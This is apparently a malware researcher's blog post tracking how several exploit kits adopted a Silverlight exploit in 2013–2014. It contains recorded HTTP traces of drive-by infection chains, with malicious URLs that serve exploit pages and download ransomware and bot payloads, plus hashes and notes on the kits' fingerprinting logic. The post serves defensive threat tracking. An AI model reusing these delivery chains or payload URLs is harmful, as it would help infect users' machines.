2013-11-13 - Exploit Integration

CVE-2013-0074/3896 (Silverlight) integrates Exploit Kits

Angler EK is definitely on the move. It's not a huge surprise when we can speculate that the team behind is the same that was first using Cool EK (Paunch VIP customer) and is behind the Reveton threat.

After integrating CVE-2013-0634 past week

Angler EK's first move on 2013-11-05. Spotted by @node5 and @EKWatcher : CVE-2013-0634. Confirmed by @timohirvonen pic.twitter.com/HOvpqhW0qm
— kafeine (@kafeine) November 7, 2013

EKWatcher has spotted a new change today : the silverlight check has now been activated and deliver an exploit.

Looks like "Angler EK" is including a Silverlight Exploit - in preference to ones for vulnerable Flash and Java
— Chris Wakelin (@EKwatcher) November 13, 2013

Pedro Marinho from Emerging Threats pointed links with Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure

(right now I don't understand why CVE-2013-3896 is mentionned here. Will update if I learn about it
<edit: 2013-11-26> so CVE-2013-3896 is used to bypass ASLR (cf post from Yuki Chen - TrendMicro)</edit>
)

CVE-2013-0074/3896 pass in Angler EK :

CVE-2013-0074 successful pass in Angler EK
2013-11-13

Silverlight 5.1.10411.0 Addon In IE used in that pass

Note: I made a pass with Silverlight 5.1.20513.0 - as fire condition told us : safe.

GET http://peragretisque.yevgenimalkin .com/leoccvkead
200 OK (text/html)

Sliverlight version checks
Angler EK 2013-11-13

Deciding if Silverlight must be fired : "sterlings"
in Angler - 2013-11-13

Call for Silverlight Exploit in Angler 2013-11-13

GET http://peragretisque.yevgenimalkin .com/0leoccvkeadmnp
200 OK (text/html)

Silverlight Call

Content of that zip

Dll TimeStamp

The DLL ( 5f36a4c019d559f1be9fdd0cd770be2e ) would be worth some works but as often, I do not have the knowledge right now to provide useful data. Will link analysis that may come.

GET http://peragretisque.yevgenimalkin .com/1leoccvkeadmnp
200 OK (application/octet-stream) Xored Reveton Ransomware.

One of the US Reveton Design
2013-11-13

Firefox ?

Silverlight 5.1.10411.0 Addon In Firefox 17

Interaction is required :

Firefox Warning on Silverlight call from Angler EK
2013-11-13

If you click... Boom...

Silverlight 5.1.10411.0 - Firefox 17
Angler EK 2013-11-13

@kafeine @EKwatcher It makes sense that it's PacketStore exploit, as that is 0074 combined with a mem disclosure and it's open source
— James Forshaw (@tiraniddo) November 19, 2013

</edit1>

Files :
Here is a Pcap
(Courtesy of Will Metcalf from Emerging Threats).
Here is a Fiddler

Styx Kein : (2013-11-19)
Have been told it was there (Thanks !)

CVE-2013-0074 positive pass in Styx Kein 2013-11-19
(payload taken from Angler EK...or more likely from here :/ )

GET http://www3.3b812bc6.kjyg .com/?7u4s=W%2BWd13CVXqabxqBnaKdrqlnOq25flomqq%2BFx1WTGbmFilZVub6VY
302 Moved Temporarily to http://www1.gh1pn3avb63m2.4pu.com/i.html?591w0k=WbOj25TcpOKa4tWm1pzXn5eqY2ZraK5W29DMbqOUlMPY1HOFwX1bpaS0YZuXoFff4XDY7JlcldaWcpuQwHWcl46b1tSs07PQnKbhpp1flNptr6yOmuCrapmklmxhnmZuZ2asVt7byaXl4XCSnNmfl6pjZmxonaTf06WTodJpkaaVaGulYlutpLRhnp%2BcaainbJKtiJqi2pOep27up%2BKalmTSpmST2MVsYdicrqBf2p%2FYjcmi2uSqnurToanaWKeel7SY39vYVqOvWJO8h2h50KiaZmOnYZ6UmGGnomHG7tJbZbNW

GET http://www1.gh1pn3avb63m2.4pu .com/i.html?591w0k=WbOj25TcpOKa4tWm1pzXn5eqY2ZraK5W29DMbqOUlMPY1HOFwX1bpaS0YZuXoFff4XDY7JlcldaWcpuQwHWcl46b1tSs07PQnKbhpp1flNptr6yOmuCrapmklmxhnmZuZ2asVt7byaXl4XCSnNmfl6pjZmxonaTf06WTodJpkaaVaGulYlutpLRhnp%2BcaainbJKtiJqi2pOep27up%2BKalmTSpmST2MVsYdicrqBf2p%2FYjcmi2uSqnurToanaWKeel7SY39vYVqOvWJO8h2h50KiaZmOnYZ6UmGGnomHG7tJbZbNW
200 OK (text/html)

GET http://www1.gh1pn3avb63m2.4pu .com/nnnnvdd.html
200 OK (text/html)

Once Decoded
This is the Java detected that will choose to fire CVE based on your version.
Should be : jorg.html should be CVE-2013-0431 or CVE-2013-0422
jvvn.html should be CVE-2013-2465
jply.html could be CVE-2013-2472 + Click 2 play bypass if it's same as in Styx
If Java does not Fire...then let's check PDF !

GET http://www1.gh1pn3avb63m2.4pu .com/pdfx.html
200 OK (text/html)

GET http://www1.gh1pn3avb63m2.4pu .com/qopne.html
200 OK (text/html)

Once decoded :
We can see the conditions to fire the CVE-2011-3402 (fnts.html)
Then some checks to fire CVE-2010-0188 (PDF)
And if PDF conditions two bullets are fired :
CVE-2013-2551 ( iexp.html) and CVE-2013-0074 (silverlight)

GET http://www1.gh1pn3avb63m2.4pu .com/iexp.html
200 OK (text/html) Call for CVE-2013-2551

GET http://www1.gh1pn3avb63m2.4pu .com/retn.html
200 OK (text/html) Call for Call (sic) for CVE-2013-0074

Call for s.html

GET http://www1.gh1pn3avb63m2.4pu .com/hdht.html
200 OK (text/html) CVE-2013-2551

GET http://www1.gh1pn3avb63m2.4pu .com/s.html
200 OK (text/html)

Call for Silverlight Exploit
(and preparation of Variable to give to the Exploit - note xlkey = 1)

GET http://www1.gh1pn3avb63m2.4pu .com/zip.eot
200 OK (application/vnd.ms-fontobject) cb9f864eb3b63172d01f9f45d849cc15

Contains :

Content of the Silverlight Call
Rip from Angler EK (or more likely from this blog... :/ )

5f36a4c019d559f1be9fdd0cd770be2e :) exact same DLL than Angler EK They didn't even try to rebuilt their exploit from Sources.

GET http://www1.gh1pn3avb63m2.4pu .com/1a8aqgdg7qedig.eot
200 OK (application/vnd.ms-fontobject) (note the 14 character Angler-ish pattern :) ) dc7647bc7896912b0fea4b93815e7fd0
This is the Actual Payload of the Exploit. It's in fact a loader that will grab the real objective : Simda

GET http://www2.h-qo05lqa59ljh7.wpbh .org/?aptlxbvy=hdPh0LXH7t6OotrTbWado5hsX%2BDe1HTDodiiqJKpq6BloZWkqKmilG1tpKKhcJKnmtjrn6epmGWX0JKX3q6ziYSS2tGbnqOa35w%3D&h=71
200 OK (application/octet-stream) 77cafd814d93ed7154676744fcf7ae75 Simda (Podmena Affiliate payload)

Want to know more about Styx Kein ? Read Inside a (The?) Simda Affiliate : Партнёрка Podmena (formerly Chesto) 2013-11-12

Files: Payload, decoded js and Fiddler (Owncloud via goo.gl)

FlashPack : 2013-12-06 (child of SafePack/CritXPack/Vintage Pack)
As Spotted by Eoin Miller the Silverlight Exploit is now in FlashPack.
(I will fly over).

CVE-2013-0074/3896 Successful pass in FlashPack
2013-12-06

GET http://besexeweryopko .com/cosmik/hkmh90B4.php
200 OK (text/html)

GET http://besexeweryopko .com/cosmik/capuro/da7c6b38522017d83733eac7775c7dbe.js
200 OK (application/javascript)

GET http://besexeweryopko .com/cosmik/silver.php?id=31302e312e302e307c302e302e302e307c31312e362e3630322e3138307c352e312e31303431312e307c57696e646f777320377c4d534945203130
200 OK (text/html)

Here, id converted from Hex to Text gives you :

10.1.0.0|0.0.0.0|11.6.602.180|5.1.10411.0|Windows 7|MSIE 10

which are respectively :
Adobe Reader, Java ,Flash, Silverlight, OS and Browser version

silver.php

GET http://besexeweryopko .com/cosmik/msie.php?id=31302e312e302e307c302e302e302e307c31312e362e3630322e3138307c352e312e31303431312e307c57696e646f777320377c4d534945203130
200 OK (text/html) <- CVE-2013-2551

GET http://besexeweryopko .com/cosmik/capuro/def6f322082144f16a8450c1d0051eeb.eot
200 OK (text/plain)

Content of the "eot"

fotomaster-cleaner.dll : 5faca70a46982cb945cd8e4b3a544aa8
TimeStamp : 2013-12-04 16:35:38

GET http://besexeweryopko .com/cosmik/capuro/fa6030784e2d535687f8c94b210dfb65.eot
200 OK (text/plain)

2nd "eot" (seems to contains parameters).

GET http://besexeweryopko .com/cosmik/loadsilver.php
200 OK (application/octet-stream) b61b986194de5fef36d805923a0f9379 (Zaccess)

Fiddler : Here

Fiesta : 2014-01-03 (integration around 2013-12-28)
Thanks Nathan Fowler for Referer!
As spotted yesterday by Will Metcalf from Emerging Threats

CVE-2013-0074/3896 successful pass in Fiesta
2014-01-03

GET http://img.hitres .in/uiwtv07/counter.php?id=2
301 Moved Permanently to http://img.hitres.in/uiwtv07/?2 (note : you won't see this pattern in all Fiesta pass)

GET http://img.hitres .in/uiwtv07/?2
200 OK (text/html)

GET http://img.hitres .in/uiwtv07/?25ea404b5396cf485b50095a060b065102015c500f045652090057020200065406
200 OK (text/html) CVE-2013-2551 try

GET http://img.hitres .in/uiwtv07/?6ec285af089912d6450915090a0e535506515a03030103560d5051510e05535002;5110411
200 OK (application/x-silverlight-app) (Note the Silverlight Version in the call) ce056895e07d2a9d04c5e8db844013ea

GET http://img.hitres .in/uiwtv07/?3c05f5cc5aaf070d561b550e540e5150035709045d010153085602565005515507;1;6
200 OK (application/octet-stream) bdcfe33dbc7f86b929ddfbfa7a4ce43d which is Miuref.A (MS name) dropping : 71af22a63b970e0ec14e17497a33ba43 Miuref. (If anyone has worked on it, i'd love knowing what is this stuff about as it's becoming widely spread)

GET http://img.hitres .in/uiwtv07/?3c05f5cc5aaf070d561b550e540e5150035709045d010153085602565005515507;1;6;1
200 OK (text/html)

Files : Fiddler, Payloads

Goon/Redkit2: ~2014-01-22

Seems after days of failed attempts GoonEK finally got Silverlight CVE-2013-0074 Exploit working. Neutrino rip-off pic.twitter.com/R18AO7Rh3K
— William Metcalf (@node5) January 22, 2014

Pcap of the infection provided by Will Metcalf. Thanks !

Successfull path in Goon on 2014-01-22
Then Kelihos Spambot loading Simda and Kelihos bot

GET http://disabilitybenefitsinsider .com/home/au/link/xmlupdater.html
200 OK (text/html)

end of CVE-2013-2551 and Silverlight call

Base64 decoded to:

Shellcode as Parameter

GET http://disabilitybenefitsinsider .com/FFE.xap
200 OK (application/x-silverlight-app) 167a0ffcfb6d828f5090b58d0b3c6b30

Xap contains

Silverlight.dll : 83b0c1ff586044dbc6c0b99c55e27534
Nicely handled by dotpeek :

Silverlight.dll in dotpeek.

GET http://disabilitybenefitsinsider .com/68283080.mp3
200 OK (application/x-msdownload)

Himan : 2014-01-23 (quite surely before. date spotted)

Silverlight CVE-2013-0074/3896 positive path in Himan
2014-01-23

GET http://jvdsdveee .pw/tevyhyme.php
200 OK (text/html)

GET http://jvdsdveee .pw/po/yt.js
200 OK (application/x-javascript)

POST http://jvdsdveee .pw/index.php
200 OK (text/html)

GET http://jvdsdveee .pw/resirypenxuvore/xie.php?gf=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) <- CVE-2013-2551

GET http://jvdsdveee .pw/resirypenxuvore/fla.php?wq=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) <- CVE-2013-0634

GET http://jvdsdveee .pw/resirypenxuvore/xe.php?gf=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) Silverlight Exploit Call

Silverlight Exploit call in HiMan 2014-01-23
http://pastebin.com/q4a0ayzd

Didn't try to decode.

GET http://jvdsdveee .pw/resirypenxuvore/d.php?hgfc=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (application/pdf)

GET http://jvdsdveee .pw/resirypenxuvore/1.zip
200 OK (application/zip) ce056895e07d2a9d04c5e8db844013ea cf Fiesta. Same Exact sample.

GET http://jvdsdveee .pw/resirypenxuvore/tx.exe
200 OK (application/octet-stream) (Ransomware 7043831f829fd8305a59cc6df09cc8b6 )

GET http://jvdsdveee .pw/resirypenxuvore/b.jar
200 OK (application/java-archive)

Nuclear Pack : 2014-09-12

Spotted by Brad
See here : 2014-09-12 - NUCLEAR EK SENDS SILVERLIGHT EXPLOIT

Post Publication Reading :
A Look At A Silverlight Exploit - Yuki Chen - TrendMicro 2013-11-25

Read More :
Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure Authored by Vitaliy Toropov
CVE-2013-0074 NIST
Lua Script by Emerging Threats to detect the exploitation in Suricata (can also be run from Command line)